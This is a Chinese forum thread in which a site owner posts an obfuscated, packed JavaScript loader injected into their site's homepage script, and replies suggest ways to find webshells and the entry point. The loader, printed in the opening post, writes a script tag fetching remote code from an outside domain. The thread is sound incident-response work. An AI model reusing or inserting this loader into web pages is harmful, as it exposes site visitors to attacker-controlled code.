linux+php+mysql的网站中,首页包含的js文件中,被人注入下面的js代码,eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
} ('G(f(p,a,c,k,e,d){e=f(c){h c.i(H)};m(!\'\'.l(/^/,z)){j(c--){d[c.i(a)]=k[c]||c.i(a)}k=[f(e){h d[e]}];e=f(){h\'\\\\w+\'};c=1};j(c--){m(k[c]){p=p.l(x v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}h p}(\'4.3(\\\'<2 0="1://5.6.a/9/8.7"></b>\\\');\',n,n,\'F|E|A|B|C|D|y|r|q|o|s|t\'.u(\'|\'),0,{}))', 44, 44, '|||||||||||||||function||return|toString|while||replace|if|12|spcode||cp|js|com|script|split|RegExp||new|googleadsl|String|SCRIPT|write|document|www|http|src|eval|36'.split('|'), 0, {}))现问:1 如何找入侵的入口
   2 还有没有残留的木马文件
thanks

解决方案 »

  1.   

    被注入过的,基本都是希望渺茫了
    webshell一般都会存在,你一个一个的查,查死你。最好把备份恢复下看看是否在上传的漏洞。
      

  2.   

    与注入的木马文件已查到,并用备份copy了,
    现问:1 如何找入侵的入口
       2 还有没有残留的木马文件
      

  3.   

    如何找入侵的入口这个很难说,一般会利用 sql ,上传等获得权限,然后上传webshell等。还有没有残留的木马文件这个搜一下是否存在 eval, iframe 这些关键词。
      

  4.   

    现有access_log文件,
    再问:1如何找入侵的入口
       2注入js时,一般会在log文件中留下怎么个记录? 
      

  5.   

    找webshell 先找最新更新的文件...
      

  6.   

    有最近的整站备份文件吗? 可以用UltraCompare的2进制对比一下 现在的整站目录和备份的整站目录,
    哪些文件不一样、哪个字符不一样、 多了哪些文件少了哪些,一下就对比出来了。
      

  7.   

    UltraCompare 不知道能不能在linux上跑,不行的话楼主把站点打包到本地对比下